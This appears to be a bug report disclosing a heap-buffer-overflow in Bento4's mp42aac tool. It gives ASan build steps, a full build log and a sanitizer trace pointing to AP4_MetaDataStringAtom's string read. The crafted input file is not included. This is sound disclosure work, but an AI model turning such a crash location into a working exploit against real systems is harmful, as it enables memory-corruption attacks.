Description
Hi, we found a possible vulnerability in the latest version of Bento4.
Environment
zhicheng@LAPTOP-DQ41SBH2:~/FuzzDriverGen/findreal/Bento4/build$ gcc --version
gcc (Ubuntu 13.3.0-6ubuntu2~24.04) 13.3.0
Copyright (C) 2023 Free Software Foundation, Inc.
This is free software; see the source for copying conditions. There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
zhicheng@LAPTOP-DQ41SBH2:~/FuzzDriverGen/findreal/Bento4/build$ cat /etc/os-release
PRETTY_NAME="Ubuntu 24.04.2 LTS"
NAME="Ubuntu"
VERSION_ID="24.04"
VERSION="24.04.2 LTS (Noble Numbat)"
VERSION_CODENAME=noble
ID=ubuntu
ID_LIKE=debian
HOME_URL="https://www.ubuntu.com/"
SUPPORT_URL="https://help.ubuntu.com/"
BUG_REPORT_URL="https://bugs.launchpad.net/ubuntu/"
PRIVACY_POLICY_URL="https://www.ubuntu.com/legal/terms-and-policies/privacy-policy"
UBUNTU_CODENAME=noble
LOGO=ubuntu-logo
Reproduction Steps
git clone git@github.com:axiomatic-systems/Bento4.git
cd ./Bento4
mkdir -p build && cd build
cmake .. \
-DCMAKE_BUILD_TYPE=Debug \
-DCMAKE_C_FLAGS="-fsanitize=address -fno-omit-frame-pointer -g -O1" \
-DCMAKE_CXX_FLAGS="-fsanitize=address -fno-omit-frame-pointer -g -O1" \
-DCMAKE_EXE_LINKER_FLAGS="-fsanitize=address"
make -j$(nproc)
./mp42aac meta_string_hbo.mp4 /dev/null
Reproduction output
zhicheng@LAPTOP-DQ41SBH2:~/FuzzDriverGen/findreal$ git clone git@github.com:axiomatic-systems/Bento4.git
Cloning into 'Bento4'...
remote: Enumerating objects: 14906, done.
remote: Counting objects: 100% (570/570), done.
remote: Compressing objects: 100% (196/196), done.
remote: Total 14906 (delta 464), reused 376 (delta 374), pack-reused 14336 (from 3)
Receiving objects: 100% (14906/14906), 48.05 MiB | 67.00 KiB/s, done.
Resolving deltas: 100% (10403/10403), done.
zhicheng@LAPTOP-DQ41SBH2:~/FuzzDriverGen/findreal$ cd ./Bento4
zhicheng@LAPTOP-DQ41SBH2:~/FuzzDriverGen/findreal/Bento4$ mkdir -p build && cd build
zhicheng@LAPTOP-DQ41SBH2:~/FuzzDriverGen/findreal/Bento4/build$ cmake .. \
-DCMAKE_BUILD_TYPE=Debug \
-DCMAKE_C_FLAGS="-fsanitize=address -fno-omit-frame-pointer -g -O1" \
-DCMAKE_CXX_FLAGS="-fsanitize=address -fno-omit-frame-pointer -g -O1" \
-DCMAKE_EXE_LINKER_FLAGS="-fsanitize=address"
-- The C compiler identification is GNU 13.3.0
-- The CXX compiler identification is GNU 13.3.0
-- Detecting C compiler ABI info
-- Detecting C compiler ABI info - done
-- Check for working C compiler: /usr/bin/cc - skipped
-- Detecting C compile features
-- Detecting C compile features - done
-- Detecting CXX compiler ABI info
-- Detecting CXX compiler ABI info - done
-- Check for working CXX compiler: /usr/bin/c++ - skipped
-- Detecting CXX compile features
-- Detecting CXX compile features - done
-- Configuring done (1.0s)
-- Generating done (0.1s)
-- Build files have been written to: /home/zhicheng/FuzzDriverGen/findreal/Bento4/build
zhicheng@LAPTOP-DQ41SBH2:~/FuzzDriverGen/findreal/Bento4/build$ make -j$(nproc)
[ 0%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Codecs/Ap4Ac3Parser.cpp.o
[ 1%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Codecs/Ap4Ac4Parser.cpp.o
[ 1%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Codecs/Ap4AdtsParser.cpp.o
[ 2%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Codecs/Ap4AvcParser.cpp.o
[ 2%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Codecs/Ap4BitStream.cpp.o
[ 2%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Codecs/Ap4HevcParser.cpp.o
[ 5%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Codecs/Ap4Eac3Parser.cpp.o
[ 5%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4.cpp.o
[ 5%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Codecs/Ap4NalParser.cpp.o
[ 5%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap48bdlAtom.cpp.o
[ 5%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Codecs/Ap4Mp4AudioInfo.cpp.o
[ 7%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4Ac4Utils.cpp.o
[ 7%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4AinfAtom.cpp.o
[ 7%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4AtomSampleTable.cpp.o
[ 8%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4Atom.cpp.o
[ 8%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4AtomFactory.cpp.o
[ 9%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4Av1cAtom.cpp.o
[ 10%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4ByteStream.cpp.o
[ 10%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4BlocAtom.cpp.o
[ 11%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4AvccAtom.cpp.o
[ 11%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4Co64Atom.cpp.o
[ 12%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4CommandFactory.cpp.o
[ 12%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4Command.cpp.o
[ 12%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4CommonEncryption.cpp.o
[ 12%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4CttsAtom.cpp.o
[ 13%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4ContainerAtom.cpp.o
[ 15%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4DataBuffer.cpp.o
[ 15%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4Dac3Atom.cpp.o
[ 15%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4Dac4Atom.cpp.o
[ 16%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4Debug.cpp.o
[ 16%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4Dec3Atom.cpp.o
[ 17%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4DecoderConfigDescriptor.cpp.o
[ 17%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4DecoderSpecificInfoDescriptor.cpp.o
[ 17%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4DescriptorFactory.cpp.o
[ 18%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4Descriptor.cpp.o
[ 19%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4DrefAtom.cpp.o
[ 19%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4DvccAtom.cpp.o
[ 20%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4ElstAtom.cpp.o
[ 20%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4Expandable.cpp.o
[ 20%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4EsDescriptor.cpp.o
[ 21%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4EsdsAtom.cpp.o
[ 22%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4File.cpp.o
[ 23%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4FileCopier.cpp.o
[ 24%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4FragmentSampleTable.cpp.o
[ 24%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4FrmaAtom.cpp.o
[ 24%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4FileWriter.cpp.o
[ 25%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4FtypAtom.cpp.o
[ 25%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4GrpiAtom.cpp.o
[ 26%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4HintTrackReader.cpp.o
[ 26%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4HdlrAtom.cpp.o
[ 27%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4HmhdAtom.cpp.o
[ 28%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4IkmsAtom.cpp.o
[ 28%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4HvccAtom.cpp.o
[ 28%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4IodsAtom.cpp.o
[ 29%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4Ipmp.cpp.o
[ 30%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4IproAtom.cpp.o
[ 31%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4IsfmAtom.cpp.o
[ 31%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4IsltAtom.cpp.o
[ 31%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4IsmaCryp.cpp.o
[ 32%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4LinearReader.cpp.o
[ 32%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4Marlin.cpp.o
[ 33%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4MdhdAtom.cpp.o
[ 33%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4MehdAtom.cpp.o
[ 34%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4MfhdAtom.cpp.o
[ 34%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4MfroAtom.cpp.o
[ 35%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4MoovAtom.cpp.o
[ 35%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4Movie.cpp.o
[ 36%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4MovieFragment.cpp.o
[ 36%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4Mpeg2Ts.cpp.o
[ 37%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4MvhdAtom.cpp.o
[ 38%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4NmhdAtom.cpp.o
[ 38%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4ObjectDescriptor.cpp.o
[ 39%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4OdafAtom.cpp.o
[ 39%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4OddaAtom.cpp.o
[ 39%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4OhdrAtom.cpp.o
[ 40%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4OdheAtom.cpp.o
[ 41%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4OmaDcf.cpp.o
[ 41%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4PdinAtom.cpp.o
[ 41%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4Processor.cpp.o
[ 42%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4Piff.cpp.o
[ 43%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4Protection.cpp.o
[ 43%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4PsshAtom.cpp.o
[ 44%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4Results.cpp.o
[ 45%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4RtpAtom.cpp.o
[ 45%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4RtpHint.cpp.o
[ 46%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4SLConfigDescriptor.cpp.o
[ 46%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4SaioAtom.cpp.o
[ 47%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4SaizAtom.cpp.o
[ 47%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4Sample.cpp.o
[ 48%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4SampleDescription.cpp.o
[ 48%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4SampleEntry.cpp.o
[ 49%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4SampleSource.cpp.o
[ 50%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4SbgpAtom.cpp.o
[ 50%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4SampleTable.cpp.o
[ 50%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4SchmAtom.cpp.o
[ 51%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4SdpAtom.cpp.o
[ 51%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4SegmentBuilder.cpp.o
[ 52%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4SencAtom.cpp.o
[ 53%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4SgpdAtom.cpp.o
[ 53%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4SidxAtom.cpp.o
[ 54%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4SmhdAtom.cpp.o
[ 54%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4StcoAtom.cpp.o
[ 55%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4SthdAtom.cpp.o
[ 56%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4StscAtom.cpp.o
[ 56%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4String.cpp.o
[ 56%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4StsdAtom.cpp.o
[ 56%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4StszAtom.cpp.o
[ 57%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4StssAtom.cpp.o
[ 58%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4SttsAtom.cpp.o
[ 58%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4Stz2Atom.cpp.o
[ 58%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4TencAtom.cpp.o
[ 59%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4SyntheticSampleTable.cpp.o
[ 60%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4TfdtAtom.cpp.o
[ 61%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4TfhdAtom.cpp.o
[ 61%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4TfraAtom.cpp.o
[ 62%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4TimsAtom.cpp.o
[ 62%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4TkhdAtom.cpp.o
[ 62%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4TrakAtom.cpp.o
[ 63%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4Track.cpp.o
[ 64%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4TrefTypeAtom.cpp.o
[ 64%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4TrexAtom.cpp.o
[ 65%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4TrunAtom.cpp.o
[ 65%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4UrlAtom.cpp.o
[ 66%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4Utils.cpp.o
[ 66%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4UuidAtom.cpp.o
[ 67%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4VmhdAtom.cpp.o
[ 67%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4VpccAtom.cpp.o
[ 68%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Crypto/Ap4AesBlockCipher.cpp.o
[ 69%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Crypto/Ap4Hmac.cpp.o
[ 69%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Crypto/Ap4KeyWrap.cpp.o
[ 70%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Crypto/Ap4StreamCipher.cpp.o
[ 70%] Building CXX object CMakeFiles/ap4.dir/Source/C++/MetaData/Ap4MetaData.cpp.o
[ 71%] Building CXX object CMakeFiles/ap4.dir/Source/C++/System/StdC/Ap4StdCFileByteStream.cpp.o
[ 71%] Building CXX object CMakeFiles/ap4.dir/Source/C++/System/Posix/Ap4PosixRandom.cpp.o
[ 72%] Linking CXX static library libap4.a
[ 72%] Built target ap4
[ 72%] Building CXX object CMakeFiles/fixaacsampledescription.dir/Source/C++/Apps/FixAacSampleDescription/FixAacSampleDescription.cpp.o
[ 73%] Building CXX object CMakeFiles/avcinfo.dir/Source/C++/Apps/AvcInfo/AvcInfo.cpp.o
[ 73%] Building CXX object CMakeFiles/mp42aac.dir/Source/C++/Apps/Mp42Aac/Mp42Aac.cpp.o
[ 73%] Building CXX object CMakeFiles/aac2mp4.dir/Source/C++/Apps/Aac2Mp4/Aac2Mp4.cpp.o
[ 76%] Building CXX object CMakeFiles/mp42hevc.dir/Source/C++/Apps/Mp42Hevc/Mp42Hevc.cpp.o
[ 77%] Building CXX object CMakeFiles/mp42avc.dir/Source/C++/Apps/Mp42Avc/Mp42Avc.cpp.o
[ 76%] Building CXX object CMakeFiles/mp4diff.dir/Source/C++/Apps/Mp4Diff/Mp4Diff.cpp.o
[ 77%] Building CXX object CMakeFiles/mp4dcfpackager.dir/Source/C++/Apps/Mp4DcfPackager/Mp4DcfPackager.cpp.o
[ 77%] Building CXX object CMakeFiles/hevcinfo.dir/Source/C++/Apps/HevcInfo/HevcInfo.cpp.o
[ 77%] Building CXX object CMakeFiles/mp4audioclip.dir/Source/C++/Apps/Mp4AudioClip/Mp4AudioClip.cpp.o
[ 78%] Building CXX object CMakeFiles/mp42ts.dir/Source/C++/Apps/Mp42Ts/Mp42Ts.cpp.o
[ 79%] Building CXX object CMakeFiles/mp42hls.dir/Source/C++/Apps/Mp42Hls/Mp42Hls.cpp.o
[ 79%] Building CXX object CMakeFiles/mp4fragment.dir/Source/C++/Apps/Mp4Fragment/Mp4Fragment.cpp.o
[ 79%] Building CXX object CMakeFiles/mp4extract.dir/Source/C++/Apps/Mp4Extract/Mp4Extract.cpp.o
[ 80%] Building CXX object CMakeFiles/mp4compact.dir/Source/C++/Apps/Mp4Compact/Mp4Compact.cpp.o
[ 80%] Building CXX object CMakeFiles/mp4edit.dir/Source/C++/Apps/Mp4Edit/Mp4Edit.cpp.o
[ 80%] Building CXX object CMakeFiles/mp4encrypt.dir/Source/C++/Apps/Mp4Encrypt/Mp4Encrypt.cpp.o
[ 80%] Building CXX object CMakeFiles/mp4decrypt.dir/Source/C++/Apps/Mp4Decrypt/Mp4Decrypt.cpp.o
[ 81%] Building CXX object CMakeFiles/mp4iframeindex.dir/Source/C++/Apps/Mp4IframeIndex/Mp4IframeIndex.cpp.o
[ 82%] Building CXX object CMakeFiles/mp4info.dir/Source/C++/Apps/Mp4Info/Mp4Info.cpp.o
[ 82%] Building CXX object CMakeFiles/mp4dump.dir/Source/C++/Apps/Mp4Dump/Mp4Dump.cpp.o
[ 84%] Building CXX object CMakeFiles/mp4tag.dir/Source/C++/Apps/Mp4Tag/Mp4Tag.cpp.o
[ 84%] Building CXX object CMakeFiles/mp4split.dir/Source/C++/Apps/Mp4Split/Mp4Split.cpp.o
[ 85%] Building CXX object CMakeFiles/mp4pssh.dir/Source/C++/Apps/Mp4Pssh/Mp4Pssh.cpp.o
[ 86%] Building CXX object CMakeFiles/mp4mux.dir/Source/C++/Apps/Mp4Mux/Mp4Mux.cpp.o
[ 87%] Building CXX object CMakeFiles/mp4rtphintinfo.dir/Source/C++/Apps/Mp4RtpHintInfo/Mp4RtpHintInfo.cpp.o
[ 88%] Linking CXX executable hevcinfo
[ 89%] Linking CXX executable mp4extract
[ 89%] Linking CXX executable mp4rtphintinfo
[ 89%] Linking CXX executable mp4audioclip
[ 90%] Linking CXX executable aac2mp4
[ 90%] Linking CXX executable mp42aac
[ 91%] Linking CXX executable fixaacsampledescription
[ 92%] Linking CXX executable avcinfo
[ 93%] Linking CXX executable mp4diff
[ 93%] Linking CXX executable mp4compact
[ 94%] Linking CXX executable mp4decrypt
[ 94%] Linking CXX executable mp4iframeindex
[ 95%] Linking CXX executable mp4dcfpackager
[ 95%] Linking CXX executable mp42avc
[ 96%] Linking CXX executable mp4dump
[ 96%] Linking CXX executable mp42hevc
[ 96%] Linking CXX executable mp4pssh
[ 97%] Linking CXX executable mp4edit
[ 97%] Linking CXX executable mp4split
[ 97%] Built target hevcinfo
[ 97%] Linking CXX executable mp42ts
[ 97%] Built target avcinfo
[ 98%] Built target mp4audioclip
[ 98%] Linking CXX executable mp4encrypt
[ 98%] Built target mp4rtphintinfo
[ 98%] Built target mp4extract
[ 98%] Built target aac2mp4
[ 98%] Built target fixaacsampledescription
[ 98%] Built target mp42aac
[ 98%] Built target mp4iframeindex
[ 98%] Built target mp4compact
[ 98%] Built target mp4decrypt
[ 98%] Built target mp4diff
[ 98%] Built target mp4dcfpackager
[ 98%] Built target mp42avc
[ 98%] Built target mp4dump
[ 98%] Built target mp42hevc
[ 98%] Built target mp4edit
[ 98%] Built target mp4pssh
[ 98%] Built target mp4split
[ 99%] Linking CXX executable mp4tag
[ 99%] Built target mp42ts
[ 99%] Built target mp4encrypt
[ 99%] Built target mp4tag
[ 99%] Linking CXX executable mp42hls
[100%] Linking CXX executable mp4fragment
[100%] Built target mp42hls
[100%] Linking CXX executable mp4info
[100%] Built target mp4fragment
[100%] Linking CXX executable mp4mux
[100%] Built target mp4info
[100%] Built target mp4mux
zhicheng@LAPTOP-DQ41SBH2:~/FuzzDriverGen/findreal/Bento4/build$ ./mp42aac meta_string_hbo.mp4 /dev/null
=================================================================
==8720==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x5020000000b1 at pc 0x7da2cea7ed7f bp 0x7ffd469d3870 sp 0x7ffd469d3018
WRITE of size 243 at 0x5020000000b1 thread T0
#0 0x7da2cea7ed7e in fread ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:996
#1 0x626ae04cfff7 in fread /usr/include/x86_64-linux-gnu/bits/stdio2.h:212
#2 0x626ae04cfff7 in AP4_StdcFileByteStream::ReadPartial(void*, unsigned int, unsigned int&) /home/zhicheng/FuzzDriverGen/findreal/Bento4/Source/C++/System/StdC/Ap4StdCFileByteStream.cpp:341
#3 0x626ae048d174 in AP4_ByteStream::Read(void*, unsigned int) /home/zhicheng/FuzzDriverGen/findreal/Bento4/Source/C++/Core/Ap4ByteStream.cpp:54
#4 0x626ae04c9242 in AP4_MetaDataStringAtom::AP4_MetaDataStringAtom(unsigned int, unsigned int, AP4_ByteStream&) /home/zhicheng/FuzzDriverGen/findreal/Bento4/Source/C++/MetaData/Ap4MetaData.cpp:1637
#5 0x626ae04ca1f2 in AP4_MetaDataAtomTypeHandler::CreateAtom(unsigned int, unsigned int, AP4_ByteStream&, unsigned int, AP4_Atom*&) /home/zhicheng/FuzzDriverGen/findreal/Bento4/Source/C++/MetaData/Ap4MetaData.cpp:428
#6 0x626ae04ddbf0 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /home/zhicheng/FuzzDriverGen/findreal/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:844
#7 0x626ae04db9bf in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /home/zhicheng/FuzzDriverGen/findreal/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:234
#8 0x626ae0501967 in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) /home/zhicheng/FuzzDriverGen/findreal/Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:196
#9 0x626ae0501c66 in AP4_ContainerAtom::AP4_ContainerAtom(unsigned int, unsigned long long, bool, AP4_ByteStream&, AP4_AtomFactory&) /home/zhicheng/FuzzDriverGen/findreal/Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:140
#10 0x626ae05022c0 in AP4_ContainerAtom::Create(unsigned int, unsigned long long, bool, bool, AP4_ByteStream&, AP4_AtomFactory&) /home/zhicheng/FuzzDriverGen/findreal/Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:88
#11 0x626ae04ca119 in AP4_MetaDataAtomTypeHandler::CreateAtom(unsigned int, unsigned int, AP4_ByteStream&, unsigned int, AP4_Atom*&) /home/zhicheng/FuzzDriverGen/findreal/Bento4/Source/C++/MetaData/Ap4MetaData.cpp:419
#12 0x626ae04ddbf0 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /home/zhicheng/FuzzDriverGen/findreal/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:844
#13 0x626ae04db9bf in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /home/zhicheng/FuzzDriverGen/findreal/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:234
#14 0x626ae0501967 in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) /home/zhicheng/FuzzDriverGen/findreal/Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:196
#15 0x626ae0501c66 in AP4_ContainerAtom::AP4_ContainerAtom(unsigned int, unsigned long long, bool, AP4_ByteStream&, AP4_AtomFactory&) /home/zhicheng/FuzzDriverGen/findreal/Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:140
#16 0x626ae05022c0 in AP4_ContainerAtom::Create(unsigned int, unsigned long long, bool, bool, AP4_ByteStream&, AP4_AtomFactory&) /home/zhicheng/FuzzDriverGen/findreal/Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:88
#17 0x626ae04dda93 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /home/zhicheng/FuzzDriverGen/findreal/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:816
#18 0x626ae04db9bf in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /home/zhicheng/FuzzDriverGen/findreal/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:234
#19 0x626ae04dc261 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, AP4_Atom*&) /home/zhicheng/FuzzDriverGen/findreal/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:154
#20 0x626ae04913cd in AP4_File::ParseStream(AP4_ByteStream&, AP4_AtomFactory&, bool) /home/zhicheng/FuzzDriverGen/findreal/Bento4/Source/C++/Core/Ap4File.cpp:104
#21 0x626ae0491946 in AP4_File::AP4_File(AP4_ByteStream&, bool) /home/zhicheng/FuzzDriverGen/findreal/Bento4/Source/C++/Core/Ap4File.cpp:78
#22 0x626ae048af8b in main /home/zhicheng/FuzzDriverGen/findreal/Bento4/Source/C++/Apps/Mp42Aac/Mp42Aac.cpp:250
#23 0x7da2ce22a1c9 in __libc_start_call_main ../sysdeps/nptl/libc_start_call_main.h:58
#24 0x7da2ce22a28a in __libc_start_main_impl ../csu/libc-start.c:360
#25 0x626ae048a844 in _start (/home/zhicheng/FuzzDriverGen/findreal/Bento4/build/mp42aac+0x2e844) (BuildId: 94ff24dd55ddc5b1351bd12a32fabe9570488544)
0x5020000000b1 is located 0 bytes after 1-byte region [0x5020000000b0,0x5020000000b1)
allocated by thread T0 here:
#0 0x7da2ceafe6c8 in operator new[](unsigned long) ../../../../src/libsanitizer/asan/asan_new_delete.cpp:98
#1 0x626ae04b3a7a in AP4_String::AP4_String(unsigned int) /home/zhicheng/FuzzDriverGen/findreal/Bento4/Source/C++/Core/Ap4String.cpp:85
#2 0x626ae04c91e8 in AP4_MetaDataStringAtom::AP4_MetaDataStringAtom(unsigned int, unsigned int, AP4_ByteStream&) /home/zhicheng/FuzzDriverGen/findreal/Bento4/Source/C++/MetaData/Ap4MetaData.cpp:1634
#3 0x626ae04ca1f2 in AP4_MetaDataAtomTypeHandler::CreateAtom(unsigned int, unsigned int, AP4_ByteStream&, unsigned int, AP4_Atom*&) /home/zhicheng/FuzzDriverGen/findreal/Bento4/Source/C++/MetaData/Ap4MetaData.cpp:428
#4 0x626ae04ddbf0 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /home/zhicheng/FuzzDriverGen/findreal/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:844
